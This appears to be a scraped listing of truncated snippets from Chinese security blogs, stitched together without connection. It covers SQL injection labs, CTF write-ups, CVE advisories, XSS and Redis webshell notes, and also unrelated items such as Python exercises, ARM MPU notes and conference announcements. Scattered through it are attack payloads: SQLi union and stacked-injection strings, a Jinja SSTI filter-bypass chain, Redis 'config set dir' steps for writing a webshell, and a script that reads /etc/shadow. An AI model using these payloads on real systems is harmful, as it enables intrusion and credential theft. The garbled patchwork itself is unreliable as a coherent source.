Have done. Then enter the program. Enable both functions: Apache and MySQL. Open the website: Next, Lets make the sqli-liab.
GitHub…
用上两题的方法,有东西被过滤了 两个大括号被过滤了
也不知道是什么意思
?name{% set podict(poa,pa)|join%} {% set a(()|select|string|list)|attr(po)(24)%} {% set ini(a,a,dict(inita)|join,a,a)|join()%} {% set glo(a,a,dict(globalsa)|join,a,a)|join()%…
文章目录XSS详解(一)一、概述二、XSS的分类2.1反射型XSS2.2存储型XSS2.3DOM型XSS三、常见XSS攻击向量四、xss测试流程图XSS详解(一)
一、概述
XSS(Cross Site Scripting)缩写为CSS,因易与层叠样式表CSS混淆ÿ…
San Bruno 是一个古雅的中产阶级住宅郊区,距离旧金山国际机场不远。而在 San Bruno 的 地下,是使用互联网作为其通信主干,由 SCADA 软件控制的天然气管道。 2010 年 9 月 9 日,因短路导致操作室误认为实际关闭的阀门是开启的状态&…
A Survey on Security and Privacy of Federated Learning
选自:Future Generation Computer Systems,2020
本文介绍了联邦学习安全以及隐私方面面临的挑战,提出了一些现有的解决方案。
引言
联邦学习(FL)提供了一种通过将数据从中心服务…
一 union注入
01 Union操作符演示
union操作符用于合并两个或多个SQL语句集合起来,得到联合的查询结果。
输入select id,email from member where usernamekevin union select username,pw from member where id1;注:union操作符一般与order by语句配合…
漏洞描述
Microsoft Teams 是微软推出的一款团队协作平台,提供了聊天、通话、在线会议、文件共享等功能。
Microsoft Teams 受影响版本中,当用户加入攻击者设置的恶意 Microsoft Teams 会议时,攻击者可远程执行任意代码。
漏洞名称Microso…
文章目录 服务管理计划任务 服务管理
systemctl 命令字 服务名 //配置服务与systemctl有关的命令字: 计划任务
一次性计划
at 时间
at now 5 min //当前时间五分钟后执行
at -l //列出计划任务
atrm 任务号 //删除计划任务执行完命令后Ctrld生效 周期性计…
文章目录 端口扫描目录扫描文件上传漏洞利用查看用户爆破密码sudo提权flag位置FunboxEasyEnum writeup walkthrough
Funbox: EasyEnum ~ VulnHub
Enumeration
Brute-force the web server’s files and directories. Be sure to check for common file extensions.
Remote…
题目环境: 发现除了表情包,再无其他F12试试发现source.php文件访问这个文件,格式如下:url/source.php回显如下:PHP代码审计:
<?php
highlight_file(__FILE__);
class emmm
{public static function ch…
原题 解题思路 直接查找看不到明显的回显变化 先找回显变化数量
-1 order by 2 #如果是3列就报错,说明只有两列。接下来找数据库名称:
-1 union select 1,databases # 结果是后端做了一些简单的过滤,需要更换查找语句。
-1; show …
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
第一种解法 堆叠注入
网页环境判断是否是字符型注入1判断是否存在关键字过滤select联合查询被过滤,只能用堆叠注入了查看有几个字段1 order by 2#正常回显1 order by 3#回显报错,可以看出只有两个字段查看所有数据库1; show databases;查看所有数据表1;…
题目1: 编写程序,输出1~1000之间所有能被4整除,但是不能被5整除的数 具体操作:
for i in range(1,1000): #循环遍历1~999,因为range是左闭右开if (i % 4 0) and (i % 5 ! 0) :print(i) 结果展示: 题目2&…
Pwn2Own Toronto 2023黑客大赛已经圆满结束,安全研究人员通过攻击消费类产品的58个零日漏洞(以及多个漏洞碰撞)赚取了1,038,500美元。此次比赛由趋势科技的零日倡议(Zero Day Initiative,简称ZDI)组织&…
导语 近日,虚拟化服务提供商VMware向客户发出警报,称其Aria Operations for Logs中的一个已修补安全漏洞的PoC利用代码已经发布。这个高危漏洞(CVE-2023-34051)是一种绕过身份验证的情况,可能导致远程代码执行。本文将…
python读取shadow文件脚本
该脚本源代码为kali中执行的源代码
from dataclasses import fieldswith open(/etc/shadow,r)as file:for line in file:listline.split(:)if list[1]!"*" and list[1]!"!" and list[1]!"!*":paslist[1].split($)sal…
redis未授权漏洞
利用条件 版本比较高的redis需要修改redis的配置文件,将bind前面#注释符去掉,将protected-mode 后面改为no 写入webshell
config get dir #查看redis数据库路径
config set dir web路径# #修改靶机Redis数据库路径
config set dbfilen…
简介
CVE-2022-32991是Web Based Quiz System v1.0版本中存在的SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。
打开靶场环境,如下 1.进行注册登录 2.点击任意一处…
1.打开文件 2.套用脚本
import random from binascii import a2b_hex,b2a_hex p 262248800182277040650192055439906580479 q 262854994239322828547925595487519915551 n p * q def multiplicative_inversr(a,b): x 0 y 1 lx 1 ly 0 oa a ob…
1.打开可以看到一个曲谱 2.看到曲谱中的提示埃塞克码可以想到ascii码,没有八可以联想到八进制,而八进制又对应着三位的二进制,然后写个脚本就好了
oct [111,114,157,166,145,123,145,143,165,162,151,164,171,126,145,162,171,115,165,143,…
为什么汽车网络安全很重要Why Automotive Cybersecurity Is Important
许多汽车公司向电子道路车辆的转变从根本上改变了整个行业,提高了汽车的互联性和智能性。随着电子汽车变得更加互联和智能,它们也越来越依赖软件来实现车辆操作,驱动更多…
文章目录 前言一、pandas是什么?二、使用步骤 1.引入库2.读入数据总结 前言 一.VLAN概述 VLAN(Virtual Local Area Network,虚拟局域网)是一种基于交换机和网络设备的划分技术,可以将不同区域的计算机、服务器和网络设…
数据库安全:MySQL 身份认证漏洞(CVE-2012-2122)
MySQL 身份认证漏洞是一个身份认证绕过漏洞,该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,这个漏洞可以使攻击者可以绕过安全身份认证,从…
1. 通过构造id1’ 和id1’) 和id1’)–确定存在注入 可知原始url为 id(‘1’) 2.使用order by 语句猜字段数
http://127.0.0.1/sqlilabs/Less-3/?id1) order by 4 --
http://127.0.0.1/sqlilabs/Less-3/?id1) order by 3 --3. 使用联合查询union select
http://127.0.0.1…
less-29 提示有最好的防火墙 小白原因 这种题型没见过 先自己测试一下 ?id1 to use near 1 预计可以使用报错注入 和单引号有关的注入点 ?id1 and 11 成功 ?id1 and 12 失败 确实是单引号字符型注入点 ?id1;%00 id1%27;%00 获取到了%00空字符(原因就是服务器获取…
2023年中职“网络安全“—Web 渗透测试② Web 渗透测试任务环境说明:1.访问http://靶机IP/web1/,获取flag值,Flag格式为flag{xxx};2.访问http://靶机IP/web2/,获取flag值,Flag格式为flag{xxx};3.访问http://靶机IP/web…
day2打了一个叫NBCTF的比赛
做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以靠这个比赛提升一波异架构能力。
heapnotes
2.31简单堆题,没啥好说的,直接改got就行了
from re import L
from pwn import *
f…
设置目录数据库访问权限
【预备知识】
活动目录(Active Directory)是面向Windows Standard Server、Windows Enterprise Server以及 Windows Datacenter Server的目录服务。(Active Directory不能运行在Windows Web Server上,但…
ARM Cortex-M处理器系列中的存储保护单元(Memory Protection Unit,简称MPU)是一种硬件机制,可用于在嵌入式系统中实现存储保护和访问权限控制。MPU允许开发人员对不同的内存区域分配不同的权限,从而提供对系统代码和数…
2023 人工智能、系统与网络安全国际学术会议 (AISNS 2023)
2023 International Conference on Artificial Intelligence, Systems and Network Security
由西南科技大学计算机科学与技术学院主办的2023人工智能、系统与网络安全国际学术会议 (AISNS 2023ÿ…
题目环境判断注入类型 1 2 3 1’ 输入1’报错提示bool(false) 可知是字符型的布尔注入(盲注) 尝试万能密码 1’ or ‘1’1 已检测SQL注入 猜测某些关键字或者字符被过滤 FUZZ字典爆破 可以看到部分关键字被过滤,包括空格 All You Want Is In …
CTF(Capture The Flag)竞赛是一个有趣的挑战。密码学是CTF竞赛中的核心元素之一,通常涉及解密、破译密码、理解加密算法等技能。以下是30个题目及答案,新入行的可以看看鸭。 题目及答案
1. Caesar Cipher
描述:给出一…
信息收集
判断存活主机
nmap -sT --min-rate 10000 192.168.182.0/24Nmap scan report for 192.168.182.135
Host is up (0.030s latency).
Not shown: 992 filtered tcp ports (no-response), 6 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp closed ssh
…
ARM SMMU(System Memory Management Unit)主要用于提供外设的DMA请求的内存管理和地址转换功能。它主要处理虚拟地址与物理地址之间的映射关系,将外设的物理地址映射到系统的虚拟地址空间。在这个过程中,SMMU会根据配置的映射表将…
Format
Format 是一种中等难度的 Linux 机器,它突出显示了由解决方案的结构方式引起的安全问题。立足点涉及PHP源代码审查,发现和利用本地文件读/写漏洞,并利用Nginx中的错误配置在Redis Unix套接字上执行命令。横向移动包括浏览 Redis 数据…
美国第二大保险公司 First American 面临严重的网络攻击 。对此,为了尽量减少此次事件的后果,部分公司系统被禁用,该公司的官方网站也暂时关闭。 First American 成立于 1889 年,专门为房地产行业提供金融和经纪服务。该公司年收入…
[SWPUCTF 2021 新生赛]sql wp
输入 1 正常回显:
?wllm1
返回:
Want Me? Cross the Waf
Your Login name:xxx
Your Password:yyy输入单引号引发报错:
?wllm1
返回:
Want Me? Cross the Waf
You have an error in your SQL s…
作者:nothinghappend 链接:https://zhuanlan.zhihu.com/p/669881930 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
CIA
CIA 三性:
机密性:和数据泄露有关。完整性…
Socket
Socket 是一台中等难度的 Linux 机器,其特点是反转 Linux/Windows 桌面应用程序以获取其源代码,从那里发现其 Web 套接字服务中的“SQL”注入。转储数据库会显示一个哈希值,一旦破解,就会产生对该框的“SSH”访问。最后&a…
1.Gartner
Gartners Top Strategic Predictions for 2024 and Beyond《Gartner顶级战略预测:2024年及未来》
https://www.gartner.com/en/articles/gartner-s-top-strategic-predictions-for-2024-and-beyond
2.IDC
Top 10 Worldwide IT Industry 2024 Predict…
【现代密码学】笔记3.4-3.7--构造安全加密方案、CPA安全、CCA安全 《introduction to modern cryphtography》 写在最前面私钥加密与伪随机性 第二部分流加密与CPA多重加密 CPA安全加密方案CPA安全实验、预言机访问(oracle access) 操作模式伪随机函数PR…
漏洞描述
Google Chrome V8 是一个由Google开发的开源JavaScript引擎,用于Google Chrome及Chromium中。
Google Chrome 120.0.6099.224版本之前中,当通过runtime-object.cc的DeleteObjectPropertyFast删除对象属性时,可能未能正确处理内存或…
order by相关注入知识 这一关的sql语句是利用的order by 根据输入的id不同数据排序不一样可以确定就是order by order by后面无法使用ubion注入(靠找不到)
可以利用后面的参数进行攻击
1)数字 没作用考虑布尔类型 rand和select ***都可以
…
流程介绍: 跳板机 A 和目标靶机 B 是可以互相访问到的,在服务器 A 上可以通过配置 netsh 端口映射访问 B 服务器。如果要拿 B 服务器的权限通常是生成正向后门,使用 kali 的 msf 正向连接B服务器,进而得到 Meterpreter,…
前言
相信很多同学了解到和学习网络安全的时候都听过kali系统,大家都称之为黑客最喜爱的系统,那么什么是kali,初学者用kali能做些什么,我将在本文中做简单的介绍
一、kali linux是什么? Kali Linux 是专门用于渗透测…
king
题目描述:李华学习到了sql注入相关的知识,他觉得十分有趣,下去还自己找了一些靶场练手,拿掉几个题之后他信心大增,扬言自己是king of sqli,这时有师傅告诉他不仅有sql注入,还有nosql注入&…
君衍. 四十六关 ORDER BY数字型注入1、源码分析2、rand()盲注3、if语句盲注4、时间盲注5、报错注入6、Limit注入7、盲注脚本 四十六关 ORDER BY数字型注入
请求方式注入类型拼接方式GET报错、布尔盲注、延时盲注ORDER BY $id 我们直接可以从界面中得知传参的参数为SORT&#x…
君衍. 一、四十六关 ORDER BY数字型注入1、源码分析2、rand()盲注3、if语句盲注4、时间盲注5、报错注入6、Limit注入 二、四十七关 ORDER BY单引号报错注入1、源码分析2、报错注入3、时间盲注 三、四十八关 ODRER BY数字型盲注1、源码分析2、rand()盲注3、if语句盲注4、时间盲注…
Linux修改IP配置 一 、查找ip配置文件 ifcfg-ens33二、编辑 vi ifcfg-ens33文件三、重启网络或者重启系统 一 、查找ip配置文件 ifcfg-ens33 cd /etc/sysconfig/network-scripts/ls //查看network-scripts文件夹下面的文件二、编辑 vi ifcfg-ens33文件
vi ifcfg-ens33注意&…
何为CTF ?
CTF(Capture The Flag)夺旗比赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。…
漏洞描述:
Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。
Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启…
题目: 上面有行小红字,“用 sqlmap 是没有灵魂的”,呵呵。。嗯,确实 啥也憋说,先上万能钥匙: a or 11 # a’ or 11 # a" or 11 # 尝试后的结果,可以发现该SQL验证是单引号,a or 11 #注入过…
一、NISP是什么
NISP证书是国家信息安全水平考试(National Information Security Test Program,简称NISP),是由中国信息安全测评中心实施培养国家网络空间安全人才的项目。由国家网络空间安全人才培养基地运营/管理,并…
题目 下载zip之后可得到提示文本 结合题目名和文本提示可知,为凯撒密码
利用脚本,爆破位移的位数
str1 FRPHEVGL
str2 str1.lower()
num 1
for i in range(26):print("{:<2d}".format(num),end )for j in str2:if(ord(j)num > or…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
目录
this 关键字
涵义
实质
使用场合
使用注意点
避免多层 this
避免数组处理方法中的 this
避免回调函数中的 this
绑定 this 的方法
Function.prototype.call()
Function.prototype.apply()
Function.prototype.bind()
箭头函数中的 this this 关键字
涵义
t…
baigeiRSA2
题目描述 import libnum
from Crypto.Util import number
from functools import reduce
from secret import flagn 5
size 64
while True:ps [number.getPrime(size) for _ in range(n)]if len(set(ps)) n:breake 65537
n reduce(lambda x, y: x*y, ps)
m …
2023年中职"网络安全"—Web 渗透测试① Web 渗透测试任务环境说明:1.访问地址http://靶机IP/task1,分析页面内容,获取flag值,Flag格式为flag{xxx};2.访问地址http://靶机IP/task2,访问登录页面。…
题目环境:F12查看源代码
I put something in F12 for you include flag.php;
$flagMRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx};
if(isset($_GET[gg])&&isset($_GET[id])) { $id$_GET[id]; $gg$_GET[gg]; if (md5($id) md5($gg) && $id ! $gg) { …
文章信息
论文题目:HeteroTiC: A robust network flow watermarking based on heterogeneous time channels 期刊(会议):Computer Networks 时间:2022 级别:CCF B 文章链接:https://doi.org/10…
Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具
名称: spring 命令执行 (CVE-2022-22947)
描述: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问A…
文章目录 一、自动驾驶/目标检测Improving Lane Detection Generalization: A Novel Framework using HD Maps for Boosting DiversityTowards Full-scene Domain Generalization in Multi-agent Collaborative Birds Eye View Segmentation for Connected and Autonomous Driv…
文章目录 前言一、现代理念二、安全的软件生命周期管理总结 前言
The concept of integrating security into the software development process is not new. While I cannot definitively assert that Microsoft was the pioneer of this concept, the Secure Development Li…
什么是MITRE ATT&CK框架
MITRE Adversarial Tactics, Techniques, and Common Knowledge(ATT&CK)是一个威胁建模框架,用于对攻击者用来入侵企业、云和工业控制系统(ICS)并发起网络攻击…
第三届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2024)
2024 3rd International Conference on Cyber Security, Artificial Intelligence and Digital Economy
第三届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2024&…
一、PGP(Pretty Good Privacy)
PGP是一种邮件加密手段,他在发邮件一方加密,然后发给发送方邮件服务器,发送方邮件服务器再发送给接收方邮件服务器,然后接收方再从接收方邮件服务器pop出来,这整…
【现代密码学】笔记6--伪随机对象的理论构造《introduction to modern cryphtography》 写在最前面6 伪随机对象的理论构造 写在最前面
主要在 哈工大密码学课程 张宇老师课件 的基础上学习记录笔记。
内容补充:骆婷老师的PPT 《introduction to modern cryphtogr…
文章信息
论文题目:Defeating DNN-Based Traffic Analysis Systems in Real-Time With Blind Adversarial Perturbations 期刊(会议):30th USENIX Security Symposium 时间:2021 级别:CCF A 文章链接&…
目录 信息收集
1、arp
2、nmap
3、nikto
4、whatweb
目录探测
gobuster
dirsearch
WEB
get flag1
/robots.txt
FTP
get flag2
telenet登录
get flag3
get flag4
9090端口
get flag5
dirsearch
ssh登录
Summer用户
get flag6
信息收集
get flag7
get fl…
DNS 攻击是指攻击者利用 DNS 服务器漏洞或缺陷,对企业的 DNS 服务器进行攻击,从而导致用户无法正常访问互联网或者被重定向到恶意网站。
以下是一些常见的 DNS 攻击原理:
1、DNS 缓存投毒(DNS Cache Poisoning)&…
web
What the cow say?
进入容器有个输入框,尝试ssti、命令执行、代码执行等,最后发现可使用反引号执行命令; 输入 nl app.py 可查看源代码,有功能具体实现、过滤之类的;
flag在 /flag_is_here home/flag_c0w54y 中…
Checkin
题目描述:Welcome to VNCTF 2024~ long time no see.
开题,是前端小游戏 源码里面发现一个16进制编码字符串 解码后是flag CutePath
题目描述:源自一次现实渗透
开题 当前页面没啥好看的,先爆破密码登录试试。爆破无果…
2024西湖论剑初赛 -- only_sql
知识点:LOAD DATA 读取客户端文件UDF提权
AmiaaaZs Site | MySQL 伪服务端读客户端任意文件
西湖打爆了,意料之中,只配复现了,还要感谢哥们的指导,把他博客挂起来鞭策了AsaL1ns blog&…
个人认为,这题还算有些东西。先来看源码
<?php
function get_the_flag(){// webadmin will remove your upload file every 20 min!!!! $userdir "upload/tmp_".md5($_SERVER[REMOTE_ADDR]);if(!file_exists($userdir)){mkdir($userdir);}if(!empty…
文章目录 一.论文信息二.论文内容1.摘要2.引言4.主要图表5.结论 一.论文信息
论文题目: Color Backdoor: A Robust Poisoning Attack in Color Space(色彩后门:色彩空间中的鲁棒中毒攻击)
论文来源: 2023-CVPR
论文团队&#x…
1.题目描述,在地址框输入下面的网址 2.来到页面,ctrlu查看源码,仔细观察会看到一个.php的跳转页面 3.点进去页面提示It doesnt come from https://Sycsecret.buuoj.cn 4.页面提示它不是来源于这个网址,我们需要用bp抓包对数据进行…
作为一个5年资深网络安全工程师前来分享我的看法。
在我看来,无论是实战还是打CTF(Capture The Flag,夺旗赛),都是学习网络安全的重要方面,只是侧重点可能有所不同。
网络安全是一个复杂且不断发展的领域…
NTLM(New Technology LAN Manager)身份验证协议是微软用于Windows身份验证的主要协议之一。早起SMB协议以明文口令的形式在网络上传输,因此产生了安全性问题。后来出现了LM(LAN Manager)身份验证协议,它非常…
Invicti 专业 Web 应用程序安全扫描器
自动、极其准确且易于使用的 Web 应用程序安全扫描程序,可自动查找网站、Web 应用程序和 Web 服务中的安全漏洞。
Invicti Professional Edition 是一款商业 Web 应用程序安全扫描器。它旨在自动查找和修复 Web 应用程序中的…
文章目录 环境说明1 MS08_067 简介2 MS08_067 复现过程3 MS08_067 安全加固 环境说明 渗透机操作系统:2024.1漏洞复现操作系统: Windows XP Professional with Service Pack 2- VL (English)安全加固复现操作系统:Windows XP Professional with Service …
一、进程管理命令
1.1 service
1.1.1 介绍
service 是一个在大多数 Linux 发行版中用于管理系统服务的命令
1.1.2 使用方法
sudo service 服务名 [start|stop|restart|status|...]
1.1.3 常见使用案例
1.1.3.1 启动服务
sudo service apache2 start
这将启动名为 apac…
目录前言一、Classic Childhood Game二、Become A Member三、Show Me Your Beauty四、Guess Who I Am后记前言
记录2023年1月的hgame比赛week1的web题 第一周还是比较简单的,除了那个涉及到网页爬虫的题一度不会写(本「待入门」选手还是太菜了
一、Cla…
在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。
堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。
这个是攻防世界的一道CTF赛题。 采用寻常思路来寻找sql注入漏洞。
payload:1 and 11-- 利用payload: and 12…
目录
信息收集
模块注入
判断类型
SSTI 信息收集
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and mediaqueries --><!-- WARNING: Respond.js doesnt work if you view the page via file://--><!--[if lt IE 9]><script src&qu…
参考资料:
Joe Kilian. Founding cryptography on oblivious transfer. In Janos Simon, editor, STOC, pages 20–31. ACM, 1988.Barak B, Goldreich O, Impagliazzo R, et al. On the (im) possibility of obfuscating programs[C]//Advances in Cryptology—CRY…
Index介绍漏洞利用过程一.泄露Libc二.Tcache Bin Attack三.完整EXP介绍
[2021 东华杯]bg3 本题是C写的一道经典菜单堆题,拥有增删改查全部功能。
Bug DataBase - V3.0 - I think i am UnBeatAble
1. Upload A Bug
2. Change A Uploaded Bug
3. Get Uploaded Bug D…
SYN_FLOOD攻击和HTTP慢速攻击是DDOS攻击的两种方式。
SYN Flood攻击 SYN Flood攻击的原理就是阻断TCP三次握手的第三次ACK包,即不对服务器发送的SYNACK数据包做出应答。由于服务器没有收到客户端发来的确认响应,就会一直保持连接直到超时,当…
权限提升:信息收集.
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshel…
信息搜集
1、nmap 扫描一波
└─# nmap -sC -sV 10.10.11.211
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-14 20:55 EDT
Nmap scan report for 10.10.11.211
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
2…
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。
我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息…
漏洞描述
Linux Kernel OverlayFS 是 Linux 内核提供的一种文件系统,允许将多个文件系统合并为一个单一的虚拟文件系统。
在 Linux Kernel OverlayFS 受影响版本中,当用户将具备特权的文件从 nosuid 的挂载点复制到另一个挂载点时,未授权的…
简介
跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码(也可能包含html代码),当用户浏览网页之时,嵌入其中Web里面…
近日,Gartner发布《新兴技术:在三重挤压中蓬勃发展—对云安全风险投资的关键洞察》(Emerging Tech: Thriving Amid the Triple Squeeze— Critical Insights on VC Funding for Cloud Security)(以下简称《报告》&…
背景知识 KDD是数据挖掘与知识发现(Data Mining and Knowledge Discovery)的简称,KDD CUP是由ACM(Association for Computing Machiner)的 SIGKDD(Special Interest Group on Knowledge Discovery and Data…
1.进入sources.list文件编辑模式
2.把kali原有的源注释掉,把阿里源放进去
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib3.更新kali的内容
1、XSS简介 跨站脚本攻击(Cross Site Script为了区别于CSS简称为XSS)指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 XSS跨站漏洞如此普遍和流行的主要因…
从事网络安全工作,手上自然离不开一些重要的网络安全工具。今天,分享10大网络安全工具。
一、Kali Linux Kali 是一个基于 Debian 的 Linux 发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这…
翻了页面,看了源代码,都没什么信息
右上角有个MENU,点进去看看 Only Cuits students can buy the FLAG
看到这句话可能就要伪造ip了
但还要回答密码,不知道什么意思,看看源代码 POST password404a,抓包修改一下身份…
Thank Zhihao Tao for your hard work. The document spent countless nights and weekends, using his hard work to make it convenient for everyone. If you have any questions, please send a email to zhihao.taooutlook.com 文章目录1. 概述2. 检测方式2.1 证书检测2.2…
Thank Zhihao Tao for your hard work. The document spent countless nights and weekends, using his hard work to make it convenient for everyone. If you have any questions, please send a email to zhihao.taooutlook.com 文章目录1. 简述2. 入侵检测系统(IDS)3. 入侵…
Thank Zhihao Tao for your hard work. The document spent countless nights and weekends, using his hard work to make it convenient for everyone. If you have any questions, please send a email to zhihao.taooutlook.com 文章目录1. 基本过程2. 握手阶段2.1 ClientH…
网络应急响应流程及工作内容
What is
应急响应对应的英文是 Incident response或emergency responcse,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。
当企业发生黑客入侵、系统崩溃货其他影响业务正常运行的安全时间是&a…
首先介绍两个知识点,在后面的实验中运用到的。
1、7Zip
7-Zip 是一款开源软件。我们可以在任何一台计算机上使用 7-Zip ,包括用在商业用途的计算机。7-Zip 适用于 Windows 7 / Vista / XP / 2008 / 2003 / 2000 / NT / ME / 98。并且有面向 Mac OS X、…
漏洞描述
Zoom 是一种用于视频会议、在线会议和远程协作的软件平台。
Zoom Desktop Client for Windows 5.14.5 之前版本由于对数据的真实性验证不足,经过身份验证的攻击者可通过网络访将权限升级为 SYSTEM 用户。
漏洞名称Zoom Desktop Client for Windows <…
漏洞描述
Microsoft Exchange Server 是微软公司开发的一款邮件服务器。
Microsoft Exchange Server 受影响版本中,具有普通用户权限(Exchange 用户凭据)的攻击者可能在同一内网环境中攻击Exchange服务,远程执行任意代码。 由于…
题目代码
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {protected $var;publi…
漏洞描述
Windows Server 中的 Network Policy Server (NPS) 是一种网络访问控制器,用于限制用户和设备对网络资源的访问权限,其 IAS Extension DCOM server 拓展服务用于调用 Server 端拓展 Api 执行身份验证等操作。
受影响版本中,由于 N…
原题
解题思路 点击join就可以进行注册 username看起来是个超链,点击跳转 在url里出现了no1,看起来可以注入,改成no1 and 12报错。本来想用sqlmap,可能是网速有问题,啥都没出来。no1order by 5报错,一共有…
zhi.oscs1024.com 漏洞类型SSRF发现时间2023-08-23漏洞等级中危MPS编号MPS-2022-63578CVE编号CVE-2022-44729漏洞影响广度极小
漏洞危害
OSCS 描述Apache XML Graphics Batik 是一个开源的、用于处理可缩放矢量图形(SVG)格式图像的工具库。 受影响版本中࿰…
Weblogic 弱口令、任意文件读取漏洞
环境安装
此次我们实验的靶场,是vnlhub中的Weblogic漏洞中的weak_password靶场,我们 cd 到weak_password,然后输入以下命令启动靶场环境:
docker-compose up -d输入以下的命令可以查看当前启…
这里是数字型注入,选择一个序号
fuzz
?id1这里过滤了很多东西 使用fuzzSQL字典,这是我自己定义编写的一个fuzz字典,内容较少
select
from
information
.
tables
whereand
"
or
|
&
union
columns
updatexml
extractvalue
databa…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
题目 得到一个md5.py 运行一下,发现报错,修改一下 运行之后又报错 报错原因是算法之前编码
正确的代码为
import hashlib
for i in range(32,127):for j in range(32,127):for k in range(32,127):mhashlib.md5()m.update((TASC chr(i) O3RJMV c…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
微软在 ncurses(new curses 的缩写)编程库中发现了一组内存损坏漏洞,威胁者可利用这些漏洞在易受攻击的 Linux 和 macOS 系统上运行恶意代码。
微软威胁情报研究人员 Jonathan Bar Or、Emanuele Cozzi 和 Michael Pearse 在今天发布的一份技…
MySQL
Mysql 身份认证绕过漏洞(CVE-2012-2122)
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
文章目录 前言Week1MiscCyberChefs Secret机密图片流量!鲨鱼!压缩包们空白格隐秘的眼睛 Web泄露的秘密Begin of UploadErrorFlaskBegin of HTTPBegin of PHPR!C!E!EasyLogin CryptobrainfuckCaesars SecertfenceVigenrebabyrsaSmall dbabyxorbabyencodin…
如果你想自学网络安全,首先你必须了解什么是网络安全!,什么是黑客!!
1.无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透2.也有 Web 防…
一、漏洞原理
log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;…
当我们进行正常访问浏览器时,进行勾选住如上内容,若我们需要进行拦截某个请求时,首先将如上勾选去掉,然后打开proxy下的Intercept,确保intercept is on 按钮打开。
然后打开intercept is on 按钮即可进行拦截请求
一、MITRE和CISA共同推出OT攻击模拟平台 MITRE公司和美国网络安全和基础设施安全局(CISA)近日发布Caldera for OT,该平台可模拟针对工业操作系统(OT)的攻击。CALDERA是一套开源自动化攻击模拟平台,应用于MI…
漏洞名称:大华智慧园区综合管理平台 poi 文件上传漏洞
English Name:Dahua Smart Park Integrated Management Platform poi file upload vulnerability
CVSS core:9.0
影响资产数:7113
漏洞描述:
大华智慧园区综合管理平台是…
题目 点开页面显示如下 页面显示了一行报错:Cannot modify header information - headers already sent by (output started at /var/www/html/index.php:3) in /var/www/html/index.php on line 4
意思为不能修改报头信息-报头已经发送(输出开始于/var/www/html/i…
目录 less-1
less-2
less 3
less 4
less 5
less-6
less-7
less-8
less-9
less-10
1-10关代码分析 less-1 判断注入点 ?id1 正常 ?id1 报错:to use near 1 ?id1\ 报错:to use near 1\ ?id1 and 11 正常 ?id1 and 11 报错:to …
